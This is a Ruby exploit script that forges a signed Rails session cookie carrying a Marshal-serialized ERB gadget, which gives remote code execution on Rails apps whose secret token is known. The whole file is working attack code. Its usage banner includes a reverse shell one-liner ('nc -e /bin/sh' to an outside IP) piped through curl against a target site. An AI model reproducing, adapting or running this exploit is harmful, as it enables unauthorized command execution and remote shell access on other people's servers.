rails_cookie_rce.rb

#!/usr/bin/env ruby

require "base64"
require "erb"
require "openssl"
require "optparse"
 
module ActiveSupport
  module Deprecation
    class DeprecatedInstanceVariableProxy
      def initialize(instance, method, var, deprecator)
        @instance = instance
        @method = method
        @var = var
        @deprecator = deprecator
      end
    end
  end
end
 
def get_content spec # use stdin if spec '-', content of spec file, or spec itself as content
  spec ? ( spec.strip == '-' ? STDIN.read : ( File.exists?(spec) ? File.open(spec,'r').read : spec ) ).strip : nil
end

opts = {}
op = OptionParser.new 
op.banner = "usage: #{$0} [opts]\nexample: #{$0} -s mysecret -c 'nc -e /bin/sh 10.0.0.1 1234' -b _myapp_session | xargs curl -v myapp.com -b 2>&1 | egrep 'Cookie:|HTTP/'"
op.on("-s", "--secret secret|filename|-", "Rails secret token")  do |s| opts[:secret] = get_content s end
op.on("-e", "--code code|filename|-", "Ruby code to execute") do |e| opts[:code] = get_content e end
op.on("-c", "--command command|filename|-", "Shell command to execute") do |c| opts[:command] = get_content c end
op.on("-b", "--cookie cookie|filename|-", "Cookie name to prepend") do |b| get_content opts[:cookie] = b end
op.parse!
 
if opts[:code] && opts[:command] || !opts[:code] && !opts[:command] || !opts[:secret] then
  $stderr.puts "ERROR: must specify secret (-s) and either ruby code (-e) or shell command (-c) "
  puts op
  exit
end

code = opts[:code] || "`#{opts[:command].gsub(/\`/,'\\\`')}`"
secret = opts[:secret]

# create payload
erb = ERB.allocate
erb.instance_variable_set :@src, code
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result, "foo", ActiveSupport::Deprecation
hash = {depr => 'something'} # make stringify_keys! happy
marshalled = Marshal.dump(hash)
payload = Base64.encode64(marshalled).gsub("\n", "")
sig = OpenSSL::HMAC.hexdigest('sha1', secret, payload)
cookie = "#{payload}--#{sig}"

puts (opts[:cookie] ? "#{opts[:cookie]}=" : '') + cookie